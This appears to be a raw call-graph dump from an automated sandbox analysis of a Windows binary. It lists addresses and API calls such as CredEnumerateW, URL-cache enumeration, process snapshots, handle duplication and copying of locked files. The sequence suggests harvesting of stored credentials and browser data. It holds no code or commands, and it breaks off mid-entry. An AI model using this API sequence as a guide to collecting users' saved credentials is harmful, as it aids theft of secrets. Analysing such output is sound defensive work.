38168->38170 38169->38164 38169->38167 38323 410c46 10 API calls 38169->38323 38173 411167 38170->38173 38171 4111af 38173->38171 38174 4111a6 qsort 38173->38174 38174->38171 38177->37974 38179 40eb10 38178->38179 38191 40e8e0 38179->38191 38182 40eb6c memcpy memcpy 38183 40ebb7 38182->38183 38183->38182 38184 40ebf2 ??2@YAPAXI ??2@YAPAXI 38183->38184 38188 40d134 16 API calls 38183->38188 38185 40ec2e ??2@YAPAXI 38184->38185 38187 40ec65 38184->38187 38185->38187 38201 40ea7f 38187->38201 38188->38183 38190 402f49 38190->37974 38192 40e8f2 38191->38192 38193 40e8eb ??3@YAXPAX 38191->38193 38194 40e900 38192->38194 38195 40e8f9 ??3@YAXPAX 38192->38195 38193->38192 38196 40e911 38194->38196 38197 40e90a ??3@YAXPAX 38194->38197 38195->38194 38198 40e931 ??2@YAPAXI ??2@YAPAXI 38196->38198 38199 40e921 ??3@YAXPAX 38196->38199 38200 40e92a ??3@YAXPAX 38196->38200 38197->38196 38198->38182 38199->38200 38200->38198 38202 40aa04 ??3@YAXPAX 38201->38202 38203 40ea88 38202->38203 38204 40aa04 ??3@YAXPAX 38203->38204 38205 40ea90 38204->38205 38206 40aa04 ??3@YAXPAX 38205->38206 38207 40ea98 38206->38207 38208 40aa04 ??3@YAXPAX 38207->38208 38209 40eaa0 38208->38209 38210 40a9ce 4 API calls 38209->38210 38211 40eab3 38210->38211 38212 40a9ce 4 API calls 38211->38212 38213 40eabd 38212->38213 38214 40a9ce 4 API calls 38213->38214 38215 40eac7 38214->38215 38216 40a9ce 4 API calls 38215->38216 38217 40ead1 38216->38217 38217->38190 38218->38150 38219->38154 38277 40b2cc 38220->38277 38222 402b0a 38223 40b2cc 27 API calls 38222->38223 38224 402b23 38223->38224 38225 40b2cc 27 API calls 38224->38225 38226 402b3a 38225->38226 38227 40b2cc 27 API calls 38226->38227 38228 402b54 38227->38228 38229 40b2cc 27 API calls 38228->38229 38230 402b6b 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402b82 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402b99 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402bb0 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402bc7 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402bde 38239->38240 38241 40b2cc 27 API calls 38240->38241 38242 402bf5 38241->38242 38243 40b2cc 27 API calls 38242->38243 38244 402c0c 38243->38244 38245 40b2cc 27 API calls 38244->38245 38246 402c23 38245->38246 38247 40b2cc 27 API calls 38246->38247 38248 402c3a 38247->38248 38249 40b2cc 27 API calls 38248->38249 38250 402c51 38249->38250 38251 40b2cc 27 API calls 38250->38251 38252 402c68 38251->38252 38253 40b2cc 27 API calls 38252->38253 38254 402c7f 38253->38254 38255 40b2cc 27 API calls 38254->38255 38256 402c99 38255->38256 38257 40b2cc 27 API calls 38256->38257 38258 402cb3 38257->38258 38259 40b2cc 27 API calls 38258->38259 38260 402cd5 38259->38260 38261 40b2cc 27 API calls 38260->38261 38262 402cf0 38261->38262 38263 40b2cc 27 API calls 38262->38263 38264 402d0b 38263->38264 38265 40b2cc 27 API calls 38264->38265 38266 402d26 38265->38266 38267 40b2cc 27 API calls 38266->38267 38268 402d3e 38267->38268 38269 40b2cc 27 API calls 38268->38269 38270 402d59 38269->38270 38271 40b2cc 27 API calls 38270->38271 38272 402d78 38271->38272 38273 40b2cc 27 API calls 38272->38273 38274 402d93 38273->38274 38275 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38274->38275 38275->38158 38276->38148 38280 40b58d 38277->38280 38279 40b2d1 38279->38222 38281 40b5a4 GetModuleHandleW FindResourceW 38280->38281 38282 40b62e 38280->38282 38283 40b5c2 LoadResource 38281->38283 38285 40b5e7 38281->38285 38282->38279 38284 40b5d0 SizeofResource LockResource 38283->38284 38283->38285 38284->38285 38285->38282 38293 40afcf 38285->38293 38287 40b608 memcpy 38296 40b4d3 memcpy 38287->38296 38289 40b61e 38297 40b3c1 18 API calls 38289->38297 38291 40b626 38298 40b04b 38291->38298 38294 40b04b ??3@YAXPAX 38293->38294 38295 40afd7 ??2@YAPAXI 38294->38295 38295->38287 38296->38289 38297->38291 38299 40b051 ??3@YAXPAX 38298->38299 38300 40b05f 38298->38300 38299->38300 38300->38282 38301->38166 38303 444a64 FreeLibrary 38302->38303 38304 444a83 38302->38304 38303->38304 38304->38168 38306 4032c4 38305->38306 38307 40b633 ??3@YAXPAX 38306->38307 38308 403316 38307->38308 38324 44553b 38308->38324 38312 403480 38520 40368c 15 API calls 38312->38520 38314 403489 38315 40b633 ??3@YAXPAX 38314->38315 38316 403495 38315->38316 38316->38168 38317 4033a9 memset memcpy 38318 4033ec wcscmp 38317->38318 38319 40333c 38317->38319 38318->38319 38319->38312 38319->38317 38319->38318 38518 4028e7 11 API calls 38319->38518 38519 40f508 6 API calls 38319->38519 38321 403421 _wcsicmp 38321->38319 38323->38169 38325 445548 38324->38325 38326 445599 38325->38326 38521 40c768 38325->38521 38327 4455a8 memset 38326->38327 38334 4457f2 38326->38334 38604 403988 38327->38604 38338 445854 38334->38338 38706 403e2d memset memset memset memset memset 38334->38706 38335 445672 38615 403fbe memset memset memset memset memset 38335->38615 38336 4458bb memset memset 38341 414c2e 16 API calls 38336->38341 38384 4458aa 38338->38384 38729 403c9c memset memset memset memset memset 38338->38729 38339 44595e memset memset 38344 414c2e 16 API calls 38339->38344 38340 4455e5 38340->38335 38347 44560f 38340->38347 38345 4458f9 38341->38345 38343 445a00 memset memset 38752 414c2e 38343->38752 38355 44599c 38344->38355 38356 40b2cc 27 API calls 38345->38356 38359 4087b3 338 API calls 38347->38359 38348 44557a 38381 44558c 38348->38381 38801 41366b FreeLibrary 38348->38801 38349 445849 38816 40b1ab ??3@YAXPAX ??3@YAXPAX 38349->38816 38350 445bca 38357 445c8b memset memset 38350->38357 38423 445cf0 38350->38423 38351 445b38 memset memset memset 38361 445bd4 38351->38361 38362 445b98 38351->38362 38365 40b2cc 27 API calls 38355->38365 38358 445909 38356->38358 38369 414c2e 16 API calls 38357->38369 38366 409d1f 6 API calls 38358->38366 38367 445621 38359->38367 38360 44589f 38817 40b1ab ??3@YAXPAX ??3@YAXPAX 38360->38817 38375 414c2e 16 API calls 38361->38375 38362->38361 38371 445ba2 38362->38371 38368 4459ac 38365->38368 38377 445919 38366->38377 38802 4454bf 20 API calls 38367->38802 38379 409d1f 6 API calls 38368->38379 38380 445cc9 38369->38380 38889 4099c6 wcslen 38371->38889 38372 4456b2 38804 40b1ab ??3@YAXPAX ??3@YAXPAX 38372->38804 38374 40b2cc 27 API calls 38385 445a4f 38374->38385 38387 445be2 38375->38387 38376 403335 38517 4452e5 45 API calls 38376->38517 38818 409b98 GetFileAttributesW 38377->38818 38378 445823 38378->38349 38391 4087b3 338 API calls 38378->38391 38393 4459bc 38379->38393 38394 409d1f 6 API calls 38380->38394 38588 444b06 38381->38588 38382 445879 38382->38360 38404 4087b3 338 API calls 38382->38404 38384->38336 38409 44594a 38384->38409 38767 409d1f wcslen wcslen 38385->38767 38398 40b2cc 27 API calls 38387->38398 38388 445d3d 38408 40b2cc 27 API calls 38388->38408 38389 445d88 memset memset memset 38392 414c2e 16 API calls 38389->38392 38391->38378 38401 445dde 38392->38401 38885 409b98 GetFileAttributesW 38393->38885 38403 445ce1 38394->38403 38395 445bb3 38892 445403 memset 38395->38892 38396 445680 38396->38372 38638 4087b3 memset 38396->38638 38407 445bf3 38398->38407 38399 445928 38399->38409 38819 40b6ef 38399->38819 38410 40b2cc 27 API calls 38401->38410 38909 409b98 GetFileAttributesW 38403->38909 38404->38382 38416 409d1f 6 API calls 38407->38416 38418 445d54 _wcsicmp 38408->38418 38409->38339 38422 4459ed 38409->38422 38421 445def 38410->38421 38411 4459cb 38411->38422 38432 40b6ef 253 API calls 38411->38432 38415 40b2cc 27 API calls 38425 445a94 38415->38425 38417 445c07 38416->38417 38428 445389 259 API calls 38417->38428 38429 445d71 38418->38429 38495 445d67 38418->38495 38420 445665 38803 40b1ab ??3@YAXPAX ??3@YAXPAX 38420->38803 38430 409d1f 6 API calls 38421->38430 38422->38343 38465 445b22 38422->38465 38423->38376 38423->38388 38423->38389 38424 445389 259 API calls 38424->38350 38772 40ae18 38425->38772 38426 44566d 38426->38334 38689 413d4c 38426->38689 38435 445c17 38428->38435 38910 445093 23 API calls 38429->38910 38438 445e03 38430->38438 38432->38422 38434 4456d8 38439 40b2cc 27 API calls 38434->38439 38440 40b2cc 27 API calls 38435->38440 38437 44563c 38437->38420 38442 4087b3 338 API calls 38437->38442 38911 409b98 GetFileAttributesW 38438->38911 38445 4456e2 38439->38445 38446 445c23 38440->38446 38441 445d83 38441->38376 38442->38437 38444 40b6ef 253 API calls 38444->38376 38805 413fa6 _wcsicmp _wcsicmp 38445->38805 38450 409d1f 6 API calls 38446->38450 38448 445e12 38455 445e6b 38448->38455 38461 40b2cc 27 API calls 38448->38461 38453 445c37 38450->38453 38451 445aa1 38454 445b17 38451->38454 38469 445ab2 memset 38451->38469 38483 409d1f 6 API calls 38451->38483 38779 40add4 38451->38779 38784 445389 38451->38784 38793 40ae51 38451->38793 38452 4456eb 38457 4456fd memset memset memset memset 38452->38457 38458 4457ea 38452->38458 38459 445389 259 API calls 38453->38459 38886 40aebe 38454->38886 38913 445093 23 API calls 38455->38913 38806 409c70 wcscpy wcsrchr 38457->38806 38809 413d29 38458->38809 38464 445c47 38459->38464 38466 445e33 38461->38466 38471 40b2cc 27 API calls 38464->38471 38465->38350 38465->38351 38472 409d1f 6 API calls 38466->38472 38468 445e7e 38473 445f67 38468->38473 38474 40b2cc 27 API calls 38469->38474 38476 445c53 38471->38476 38477 445e47 38472->38477 38478 40b2cc 27 API calls 38473->38478 38474->38451 38475 409c70 2 API calls 38479 44577e 38475->38479 38480 409d1f 6 API calls 38476->38480 38912 409b98 GetFileAttributesW 38477->38912 38482 445f73 38478->38482 38484 409c70 2 API calls 38479->38484 38485 445c67 38480->38485 38487 409d1f 6 API calls 38482->38487 38483->38451 38488 44578d 38484->38488 38489 445389 259 API calls 38485->38489 38486 445e56 38486->38455 38492 445e83 memset 38486->38492 38490 445f87 38487->38490 38488->38458 38494 40b2cc 27 API calls 38488->38494 38489->38350 38916 409b98 GetFileAttributesW 38490->38916 38496 40b2cc 27 API calls 38492->38496 38498 4457a8 38494->38498 38495->38376 38495->38444 38497 445eab 38496->38497 38499 409d1f 6 API calls 38497->38499 38500 409d1f 6 API calls 38498->38500 38501 445ebf 38499->38501 38502 4457b8 38500->38502 38503 40ae18 9 API calls 38501->38503 38808 409b98 GetFileAttributesW 38502->38808 38513 445ef5 38503->38513 38505 4457c7 38505->38458 38507 4087b3 338 API calls 38505->38507 38506 40ae51 9 API calls 38506->38513 38507->38458 38508 445f5c 38510 40aebe FindClose 38508->38510 38509 40add4 2 API calls 38509->38513 38510->38473 38511 40b2cc 27 API calls 38511->38513 38512 409d1f 6 API calls 38512->38513 38513->38506 38513->38508 38513->38509 38513->38511 38513->38512 38515 445f3a 38513->38515 38914 409b98 GetFileAttributesW 38513->38914 38915 445093 23 API calls 38515->38915 38517->38319 38518->38321 38519->38319 38520->38314 38522 40c775 38521->38522 38917 40b1ab ??3@YAXPAX ??3@YAXPAX 38522->38917 38524 40c788 38918 40b1ab ??3@YAXPAX ??3@YAXPAX 38524->38918 38526 40c790 38919 40b1ab ??3@YAXPAX ??3@YAXPAX 38526->38919 38528 40c798 38529 40aa04 ??3@YAXPAX 38528->38529 38530 40c7a0 38529->38530 38920 40c274 memset 38530->38920 38535 40a8ab 9 API calls 38536 40c7c3 38535->38536 38537 40a8ab 9 API calls 38536->38537 38538 40c7d0 38537->38538 38949 40c3c3 38538->38949 38542 40c877 38551 40bdb0 38542->38551 38543 40c86c 38991 4053fe 39 API calls 38543->38991 38545 40c7e5 38545->38542 38545->38543 38550 40c634 50 API calls 38545->38550 38974 40a706 38545->38974 38550->38545 39159 404363 38551->39159 38554 40bf5d 39179 40440c 38554->39179 38556 40bdee 38556->38554 38559 40b2cc 27 API calls 38556->38559 38557 40bddf CredEnumerateW 38557->38556 38560 40be02 wcslen 38559->38560 38560->38554 38563 40be1e 38560->38563 38561 40be26 _wcsncoll 38561->38563 38563->38554 38563->38561 38565 40be7d memset 38563->38565 38566 40bea7 memcpy 38563->38566 38567 40bf11 wcschr 38563->38567 38568 40b2cc 27 API calls 38563->38568 38570 40bf43 LocalFree 38563->38570 39182 40bd5d 28 API calls 38563->39182 39183 404423 38563->39183 38565->38563 38565->38566 38566->38563 38566->38567 38567->38563 38569 40bef6 _wcsnicmp 38568->38569 38569->38563 38569->38567 38570->38563 38571 4135f7 39198 4135e0 38571->39198 38574 40b2cc 27 API calls 38575 41360d 38574->38575 38576 40a804 8 API calls 38575->38576 38577 413613 38576->38577 38578 41361b 38577->38578 38579 41363e 38577->38579 38580 40b273 27 API calls 38578->38580 38581 4135e0 FreeLibrary 38579->38581 38582 413625 GetProcAddress 38580->38582 38583 413643 38581->38583 38582->38579 38584 413648 38582->38584 38583->38348 38585 413658 38584->38585 38586 4135e0 FreeLibrary 38584->38586 38585->38348 38587 413666 38586->38587 38587->38348 39201 4449b9 38588->39201 38591 444c1f 38591->38326 38592 4449b9 42 API calls 38594 444b4b 38592->38594 38593 444c15 38595 4449b9 42 API calls 38593->38595 38594->38593 39222 444972 GetVersionExW 38594->39222 38595->38591 38597 444b99 memcmp 38602 444b8c 38597->38602 38598 444c0b 39226 444a85 42 API calls 38598->39226 38602->38597 38602->38598 39223 444aa5 42 API calls 38602->39223 39224 40a7a0 GetVersionExW 38602->39224 39225 444a85 42 API calls 38602->39225 38605 40399d 38604->38605 39227 403a16 38605->39227 38607 403a09 39241 40b1ab ??3@YAXPAX ??3@YAXPAX 38607->39241 38609 4039a3 38609->38607 38613 4039f4 38609->38613 39238 40a02c CreateFileW 38609->39238 38610 403a12 wcsrchr 38610->38340 38613->38607 38614 4099c6 2 API calls 38613->38614 38614->38607 38616 414c2e 16 API calls 38615->38616 38617 404048 38616->38617 38618 414c2e 16 API calls 38617->38618 38619 404056 38618->38619 38620 409d1f 6 API calls 38619->38620 38621 404073 38620->38621 38622 409d1f 6 API calls 38621->38622 38623 40408e 38622->38623 38624 409d1f 6 API calls 38623->38624 38625 4040a6 38624->38625 38626 403af5 20 API calls 38625->38626 38627 4040ba 38626->38627 38628 403af5 20 API calls 38627->38628 38629 4040cb 38628->38629 39268 40414f memset 38629->39268 38631 404140 39282 40b1ab ??3@YAXPAX ??3@YAXPAX 38631->39282 38633 4040ec memset 38636 4040e0 38633->38636 38634 404148 38634->38396 38635 4099c6 2 API calls 38635->38636 38636->38631 38636->38633 38636->38635 38637 40a8ab 9 API calls 38636->38637 38637->38636 39295 40a6e6 WideCharToMultiByte 38638->39295 38640 4087ed 39296 4095d9 memset 38640->39296 38643 408953 38643->38396 38644 408809 memset memset memset memset memset 38645 40b2cc 27 API calls 38644->38645 38646 4088a1 38645->38646 38647 409d1f 6 API calls 38646->38647 38648 4088b1 38647->38648 38649 40b2cc 27 API calls 38648->38649 38650 4088c0 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 4088d0 38651->38652 38653 40b2cc 27 API calls 38652->38653 38654 4088df 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 4088ef 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 4088fe 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 40890e 38659->38660 38661 40b2cc 27 API calls 38660->38661 38662 40891d 38661->38662 38663 409d1f 6 API calls 38662->38663 38664 40892d 38663->38664 39315 409b98 GetFileAttributesW 38664->39315 38666 40893e 38667 408943 38666->38667 38668 408958 38666->38668 39316 407fdf 75 API calls 38667->39316 39317 409b98 GetFileAttributesW 38668->39317 38671 408964 38672 408969 38671->38672 38673 40897b 38671->38673 39318 4082c7 199 API calls 38672->39318 39319 409b98 GetFileAttributesW 38673->39319 38676 408987 38677 4089a1 38676->38677 38678 40898c 38676->38678 38690 40b633 ??3@YAXPAX 38689->38690 38691 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38690->38691 38692 413f00 Process32NextW 38691->38692 38693 413da5 OpenProcess 38692->38693 38694 413f17 CloseHandle 38692->38694 38695 413df3 memset 38693->38695 38698 413eb0 38693->38698 38694->38434 39607 413f27 38695->39607 38697 413ebf ??3@YAXPAX 38697->38698 38698->38692 38698->38697 38699 4099f4 3 API calls 38698->38699 38699->38698 38701 413e37 GetModuleHandleW 38702 413e1f 38701->38702 38703 413e46 GetProcAddress 38701->38703 38702->38701 39612 413959 38702->39612 39628 413ca4 38702->39628 38703->38702 38705 413ea2 CloseHandle 38705->38698 38707 414c2e 16 API calls 38706->38707 38708 403eb7 38707->38708 38709 414c2e 16 API calls 38708->38709 38710 403ec5 38709->38710 38711 409d1f 6 API calls 38710->38711 38712 403ee2 38711->38712 38713 409d1f 6 API calls 38712->38713 38714 403efd 38713->38714 38715 409d1f 6 API calls 38714->38715 38716 403f15 38715->38716 38717 403af5 20 API calls 38716->38717 38718 403f29 38717->38718 38719 403af5 20 API calls 38718->38719 38720 403f3a 38719->38720 38721 40414f 33 API calls 38720->38721 38722 403f4f 38721->38722 38723 403faf 38722->38723 38725 403f5b memset 38722->38725 38727 4099c6 2 API calls 38722->38727 38728 40a8ab 9 API calls 38722->38728 39642 40b1ab ??3@YAXPAX ??3@YAXPAX 38723->39642 38725->38722 38726 403fb7 38726->38378 38727->38722 38728->38722 38730 414c2e 16 API calls 38729->38730 38731 403d26 38730->38731 38732 414c2e 16 API calls 38731->38732 38733 403d34 38732->38733 38734 409d1f 6 API calls 38733->38734 38735 403d51 38734->38735 38736 409d1f 6 API calls 38735->38736 38737 403d6c 38736->38737 38738 409d1f 6 API calls 38737->38738 38739 403d84 38738->38739 38740 403af5 20 API calls 38739->38740 38741 403d98 38740->38741 38742 403af5 20 API calls 38741->38742 38743 403da9 38742->38743 38744 40414f 33 API calls 38743->38744 38745 403dbe 38744->38745 38746 403e1e 38745->38746 38747 403dca memset 38745->38747 38750 4099c6 2 API calls 38745->38750 38751 40a8ab 9 API calls 38745->38751 39643 40b1ab ??3@YAXPAX ??3@YAXPAX 38746->39643 38747->38745 38749 403e26 38749->38382 38750->38745 38751->38745 38753 414b81 9 API calls 38752->38753 38754 414c40 38753->38754 38755 414c73 memset 38754->38755 39644 409cea 38754->39644 38756 414c94 38755->38756 39647 414592 RegOpenKeyExW 38756->39647 38760 414c64 38760->38374 38761 414cc1 38762 414cf4 wcscpy 38761->38762 39648 414bb0 wcscpy 38761->39648 38762->38760 38764 414cd2 39649 4145ac RegQueryValueExW 38764->39649 38766 414ce9 RegCloseKey 38766->38762 38768 409d62 38767->38768 38769 409d43 wcscpy 38767->38769 38768->38415 38770 409719 2 API calls 38769->38770 38771 409d51 wcscat 38770->38771 38771->38768 38773 40aebe FindClose 38772->38773 38774 40ae21 38773->38774 38775 4099c6 2 API calls 38774->38775 38776 40ae35 38775->38776 38777 409d1f 6 API calls 38776->38777 38778 40ae49 38777->38778 38778->38451 38780 40ade0 38779->38780 38781 40ae0f 38779->38781 38780->38781 38782 40ade7 wcscmp 38780->38782 38781->38451 38782->38781 38783 40adfe wcscmp 38782->38783 38783->38781 38785 40ae18 9 API calls 38784->38785 38791 4453c4 38785->38791 38786 40ae51 9 API calls 38786->38791 38787 4453f3 38789 40aebe FindClose 38787->38789 38788 40add4 2 API calls 38788->38791 38790 4453fe 38789->38790 38790->38451 38791->38786 38791->38787 38791->38788 38792 445403 254 API calls 38791->38792 38792->38791 38794 40ae7b FindNextFileW 38793->38794 38795 40ae5c FindFirstFileW 38793->38795 38796 40ae94 38794->38796 38797 40ae8f 38794->38797 38795->38796 38799 40aeb6 38796->38799 38800 409d1f 6 API calls 38796->38800 38798 40aebe FindClose 38797->38798 38798->38796 38799->38451 38800->38799 38801->38381 38802->38437 38803->38426 38804->38426 38805->38452 38807 409c89 38806->38807 38807->38475 38808->38505 38810 413d39 38809->38810 38811 413d2f FreeLibrary 38809->38811 38812 40b633 ??3@YAXPAX 38810->38812 38811->38810 38813 413d42 38812->38813 38814 40b633 ??3@YAXPAX 38813->38814 38815 413d4a 38814->38815 38815->38334 38816->38338 38817->38384 38818->38399 38820 44db70 38819->38820 38821 40b6fc memset 38820->38821 38822 409c70 2 API calls 38821->38822 38823 40b732 wcsrchr 38822->38823 38824 40b743 38823->38824 38825 40b746 memset 38823->38825 38824->38825 38826 40b2cc 27 API calls 38825->38826 38827 40b76f 38826->38827 38828 409d1f 6 API calls 38827->38828 38829 40b783 38828->38829 39650 409b98 GetFileAttributesW 38829->39650 38831 40b792 38832 40b7c2 38831->38832 38833 409c70 2 API calls 38831->38833 39651 40bb98 38832->39651 38835 40b7a5 38833->38835 38837 40b2cc 27 API calls 38835->38837 38840 40b7b2 38837->38840 38838 40b837 FindCloseChangeNotification 38842 40b83e memset 38838->38842 38839 40b817 39685 409a45 GetTempPathW 38839->39685 38843 409d1f 6 API calls 38840->38843 39684 40a6e6 WideCharToMultiByte 38842->39684 38843->38832 38844 40b827 CopyFileW 38844->38842 38846 40b866 38847 444432 121 API calls 38846->38847 38848 40b879 38847->38848 38849 40bad5 38848->38849 38850 40b273 27 API calls 38848->38850 38851 40baeb 38849->38851 38852 40bade DeleteFileW 38849->38852 38853 40b89a 38850->38853 38854 40b04b ??3@YAXPAX 38851->38854 38852->38851 38855 438552 134 API calls 38853->38855 38856 40baf3 38854->38856 38857 40b8a4 38855->38857 38856->38409 38858 40bacd 38857->38858 38860 4251c4 137 API calls 38857->38860 38859 443d90 111 API calls 38858->38859 38859->38849 38882 40b8b8 38860->38882 38861 40bac6 39697 424f26 123 API calls 38861->39697 38862 40b8bd memset 39688 425413 17 API calls 38862->39688 38865 425413 17 API calls 38865->38882 38868 40a71b MultiByteToWideChar 38868->38882 38871 40b9b5 memcmp 38871->38882 38872 4099c6 2 API calls 38872->38882 38873 404423 38 API calls 38873->38882 38876 40bb3e memset memcpy 39698 40a734 MultiByteToWideChar 38876->39698 38877 4251c4 137 API calls 38877->38882 38879 40bb88 LocalFree 38879->38882 38882->38861 38882->38862 38882->38865 38882->38868 38882->38871 38882->38872 38882->38873 38882->38876 38882->38877 38883 40ba5f memcmp 38882->38883 38884 40a734 MultiByteToWideChar 38882->38884 39689 4253ef 16 API calls 38882->39689 39690 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38882->39690 39691 4253af 17 API calls 38882->39691 39692 4253cf 17 API calls 38882->39692 39693 447280 memset 38882->39693 39694 447960 memset memcpy memcpy memcpy 38882->39694 39695 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38882->39695 39696 447920 memcpy memcpy memcpy 38882->39696 38883->38882 38884->38882 38885->38411 38887 40aed1 38886->38887 38888 40aec7 FindClose 38886->38888 38887->38465 38888->38887 38890 4099d7 38889->38890 38891 4099da memcpy 38889->38891 38890->38891 38891->38395 38893 40b2cc 27 API calls 38892->38893 38894 44543f 38893->38894 38895 409d1f 6 API calls 38894->38895 38896 44544f 38895->38896 39790 409b98 GetFileAttributesW 38896->39790 38898 44545e 38899 445476 38898->38899 38900 40b6ef 253 API calls 38898->38900 38901 40b2cc 27 API calls 38899->38901 38900->38899 38902 445482 38901->38902 38903 409d1f 6 API calls 38902->38903 38904 445492 38903->38904 39791 409b98 GetFileAttributesW 38904->39791 38906 4454a1 38907 4454b9 38906->38907 38908 40b6ef 253 API calls 38906->38908 38907->38424 38908->38907 38909->38423 38910->38441 38911->38448 38912->38486 38913->38468 38914->38513 38915->38513 38916->38495 38917->38524 38918->38526 38919->38528 38921 414c2e 16 API calls 38920->38921 38922 40c2ae 38921->38922 38992 40c1d3 38922->38992 38927 40c3be 38944 40a8ab 38927->38944 38928 40afcf 2 API calls 38929 40c2fd FindFirstUrlCacheEntryW 38928->38929 38930 40c3b6 38929->38930 38931 40c31e wcschr 38929->38931 38932 40b04b ??3@YAXPAX 38930->38932 38933 40c331 38931->38933 38934 40c35e FindNextUrlCacheEntryW 38931->38934 38932->38927 38935 40a8ab 9 API calls 38933->38935 38934->38931 38936 40c373 GetLastError 38934->38936 38939 40c33e wcschr 38935->38939 38937 40c3ad FindCloseUrlCache 38936->38937 38938 40c37e 38936->38938 38937->38930 38940 40afcf 2 API calls 38938->38940 38939->38934 38941 40c34f 38939->38941 38942 40c391 FindNextUrlCacheEntryW 38940->38942 38943 40a8ab 9 API calls 38941->38943 38942->38931 38942->38937 38943->38934 39086 40a97a 38944->39086 38947 40a8cc 38947->38535 38948 40a8d0 7 API calls 38948->38947 39091 40b1ab ??3@YAXPAX ??3@YAXPAX 38949->39091 38951 40c3dd 38952 40b2cc 27 API calls 38951->38952 38953 40c3e7 38952->38953 39092 414592 RegOpenKeyExW 38953->39092 38955 40c3f4 38956 40c50e 38955->38956 38957 40c3ff 38955->38957 38971 405337 38956->38971 38958 40a9ce 4 API calls 38957->38958 38959 40c418 memset 38958->38959 39093 40aa1d 38959->39093 38962 40c471 38964 40c47a _wcsupr 38962->38964 38963 40c505 RegCloseKey 38963->38956 38965 40a8d0 7 API calls 38964->38965 38966 40c498 38965->38966 38967 40a8d0 7 API calls 38966->38967 38968 40c4ac memset 38967->38968 38969 40aa1d 38968->38969 38970 40c4e4 RegEnumValueW 38969->38970 38970->38963 38970->38964 39095 405220 38971->39095 38975 4099c6 2 API calls 38974->38975 38976 40a714 _wcslwr 38975->38976 38977 40c634 38976->38977 39152 405361 38977->39152 38980 40c65c wcslen 39155 4053b6 39 API calls 38980->39155 38981 40c71d wcslen 38981->38545 38983 40c713 39158 4053df 39 API calls 38983->39158 38984 40c677 38984->38983 39156 40538b 39 API calls 38984->39156 38987 40c6a5 38987->38983 38988 40c6a9 memset 38987->38988 38989 40c6d3 38988->38989 39157 40c589 44 API calls 38989->39157 38991->38542 38993 40ae18 9 API calls 38992->38993 38999 40c210 38993->38999 38994 40ae51 9 API calls 38994->38999 38995 40c264 38996 40aebe FindClose 38995->38996 38998 40c26f 38996->38998 38997 40add4 2 API calls 38997->38999 39004 40e5ed memset memset 38998->39004 38999->38994 38999->38995 38999->38997 39000 40c231 _wcsicmp 38999->39000 39001 40c1d3 35 API calls 38999->39001 39000->38999 39002 40c248 39000->39002 39001->38999 39017 40c084 22 API calls 39002->39017 39005 414c2e 16 API calls 39004->39005 39006 40e63f 39005->39006 39007 409d1f 6 API calls 39006->39007 39008 40e658 39007->39008 39018 409b98 GetFileAttributesW 39008->39018 39010 40e667 39011 40e680 39010->39011 39013 409d1f 6 API calls 39010->39013 39019 409b98 GetFileAttributesW 39011->39019 39013->39011 39014 40e68f 39015 40c2d8 39014->39015 39020 40e4b2 39014->39020 39015->38927 39015->38928 39017->38999 39018->39010 39019->39014 39041 40e01e 39020->39041 39022 40e593 39023 40e5b0 39022->39023 39024 40e59c DeleteFileW 39022->39024 39026 40b04b ??3@YAXPAX 39023->39026 39024->39023 39025 40e521 39025->39022 39064 40e175 39025->39064 39027 40e5bb 39026->39027 39029 40e5c4 CloseHandle 39027->39029 39030 40e5cc 39027->39030 39029->39030 39032 40b633 ??3@YAXPAX 39030->39032 39031 40e573 39034 40e584 39031->39034 39035 40e57c FindCloseChangeNotification 39031->39035 39033 40e5db 39032->39033 39038 40b633 ??3@YAXPAX 39033->39038 39085 40b1ab ??3@YAXPAX ??3@YAXPAX 39034->39085 39035->39034 39037 40e540 39037->39031 39084 40e2ab 30 API calls 39037->39084 39039 40e5e3 39038->39039 39039->39015 39042 406214 22 API calls 39041->39042 39043 40e03c 39042->39043 39044 40e16b 39043->39044 39045 40dd85 74 API calls 39043->39045 39044->39025 39046 40e06b 39045->39046 39046->39044 39047 40afcf ??2@YAPAXI ??3@YAXPAX 39046->39047 39048 40e08d OpenProcess 39047->39048 39049 40e0a4 GetCurrentProcess DuplicateHandle 39048->39049 39053 40e152 39048->39053 39050 40e0d0 GetFileSize 39049->39050 39051 40e14a CloseHandle 39049->39051 39054 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39050->39054 39051->39053 39052 40e160 39056 40b04b ??3@YAXPAX 39052->39056 39053->39052 39055 406214 22 API calls 39053->39055 39057 40e0ea 39054->39057 39055->39052 39056->39044 39058 4096dc CreateFileW 39057->39058 39059 40e0f1 CreateFileMappingW 39058->39059 39060 40e140 CloseHandle CloseHandle 39059->39060 39061 40e10b MapViewOfFile 39059->39061 39060->39051 39062 40e13b FindCloseChangeNotification 39061->39062 39063 40e11f WriteFile UnmapViewOfFile 39061->39063 39062->39060 39063->39062 39065 40e18c 39064->39065 39066 406b90 11 API calls 39065->39066 39067 40e19f 39066->39067 39068 40e1a7 memset 39067->39068 39069 40e299 39067->39069 39074 40e1e8 39068->39074 39070 4069a3 ??3@YAXPAX ??3@YAXPAX 39069->39070 39071 40e2a4 39070->39071 39071->39037 39072 406e8f 13 API calls 39072->39074 39073 406b53 SetFilePointerEx ReadFile 39073->39074 39074->39072 39074->39073 39075 40e283 39074->39075 39076 40dd50 _wcsicmp 39074->39076 39080 40742e 8 API calls 39074->39080 39081 40aae3 wcslen wcslen _memicmp 39074->39081 39082 40e244 _snwprintf 39074->39082 39077 40e291 39075->39077 39078 40e288 ??3@YAXPAX 39075->39078 39076->39074 39079 40aa04 ??3@YAXPAX 39077->39079 39078->39077 39079->39069 39080->39074 39081->39074 39083 40a8d0 7 API calls 39082->39083 39083->39074 39084->39037 39085->39022 39087 40a980 39086->39087 39088 40a8bb 39087->39088 39089 40a995 _wcsicmp 39087->39089 39090 40a99c wcscmp 39087->39090 39088->38947 39088->38948 39089->39087 39090->39087 39091->38951 39092->38955 39094 40aa23 